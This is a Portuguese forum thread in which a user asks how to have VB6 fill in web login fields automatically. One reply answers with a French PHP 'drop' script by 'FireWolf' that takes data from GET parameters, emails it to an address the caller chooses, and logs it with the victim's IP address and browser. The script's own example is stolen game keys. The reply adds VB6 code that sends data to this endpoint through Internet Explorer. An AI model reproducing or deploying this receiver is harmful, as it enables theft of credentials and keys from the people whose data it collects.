• Revista PROGRAMAR: Já está disponível a edição #53 da revista programar. Faz já o download aqui!

programadorvb6

Como lançar o nosso User e Password

7 mensagens neste tópico

Caros amigos, tou com um problema ;como fazer em vb6 para lançar na pagina web o nosso User e a respectiva Password de um modo automático ?

alguém me pode ajudar ?

grato

Programadorvb6

:hmm:

0

Partilhar esta mensagem


Link para a mensagem
Partilhar noutros sites

O user e a pass são introduzidos por POST ou por GET, ou seja, por formulario, ou por endereco?

0

Partilhar esta mensagem


Link para a mensagem
Partilhar noutros sites

O user e a pass são introduzidos por POST ou por GET, ou seja, por formulario, ou por endereco?

Ele quer mesmo saber como preencher o form automaticamente e não como fazer login.
0

Partilhar esta mensagem


Link para a mensagem
Partilhar noutros sites

Resumindo:

Bom dia tou com um problema em VB6, talvez vocês me possam ajudar.

que é o seguinte:

Como lançar o nosso User e Password para uma página Web de forma automática ? ou seja por endereço.

isto é sem ter-mos de escreve-las.

até +

programadorvb6

0

Partilhar esta mensagem


Link para a mensagem
Partilhar noutros sites

Boas.

Se o percebi o que queres então podes utilizar uma forma bem simples, basta utilizares um ficheiro em php que receba os dados e os guarde num ficheiro de texto.

Ficheiro php:

<?php
/*
-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-

utilisation de cette page :
http://www.site.com/page.php?adresse=mail@receveur.com&sujet=sujet_du_mail&message=jeux 1 : clée1<br>jeux 2 : clée2...

et le log est dispo par mail et dans : http://www.site.com/keycool.htm

~-=Par FireWolf=-~
_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-
*/

$adresse= $_GET['adresse'];
$sujet= $_GET['sujet'];
$message= $_GET['message'];


$date = date("H:i:s - Y/m/d");   //Variable de la date

$body="Infos recupérés le : $date<br>de l'IP : ".$REMOTE_ADDR."<br>Le Navigateur Web de la victime est : ".$HTTP_USER_AGENT."<br>$message<br>la partie PHP a été crée par FireWolf<br>Have Fun "; //corps du mail

mail($adresse, $sujet, "$body", "From: expediteur@expediteur.com\nContent-Type: text/html; charset=iso-8859-1\n");   //l'envoi du mail

$somecontent ="$body <br> <br> <br> <br> Enregistrement suivant : <br> <br> <br> <br>";
$filename = 'log.htm';

// Assurons nous que le fichier est accessible en écriture
if (is_writable($filename)) {

   // Dans notre exemple, nous ouvrons le fichier $filename en mode d'ajout
   // Le pointeur de fichier est placé à la fin du fichier
   // c'est là que $somecontent sera placé
   if (!$handle = fopen($filename, 'a')) {
         echo "Impossible d'ouvrir le fichier ($filename)";
         exit;
   }

   // Ecrivons quelque chose dans notre fichier.
   if (fwrite($handle, $somecontent) === FALSE) {
       echo "Impossible d'écrire dans le fichier ($filename)";
       exit;
   }
  
   echo "Merci ;-)";
  
   fclose($handle);
                  
} else {
   echo "Enregistrement impossible";
}



?> 
<title>Page d'envoi de mail</title>

Eu não sei trabalhar em PHP mas pelo que vi vais ter de retirar ai umas linhas e ajeitar isso conforme as tuas necessidades.

Em VB6 tens de fazer apenas isto:

dim email as string
dim subject as string
dim message as string

email = "teste@coisas.com"
subject = "Teste"
message = "Mensagem Teste"


Set ie1 = CreateObject("InternetExplorer.Application")
ie1.Visible = True
ie1.Navigate2 "http://www.site.com/page.php?adresse=email&sujet=subject&message=message"

E é só isto que tens de fazer.

Cumps

0

Partilhar esta mensagem


Link para a mensagem
Partilhar noutros sites

Crie uma conta ou ligue-se para comentar

Só membros podem comentar

Criar nova conta

Registe para ter uma conta na nossa comunidade. É fácil!


Registar nova conta

Entra

Já tem conta? Inicie sessão aqui.


Entrar Agora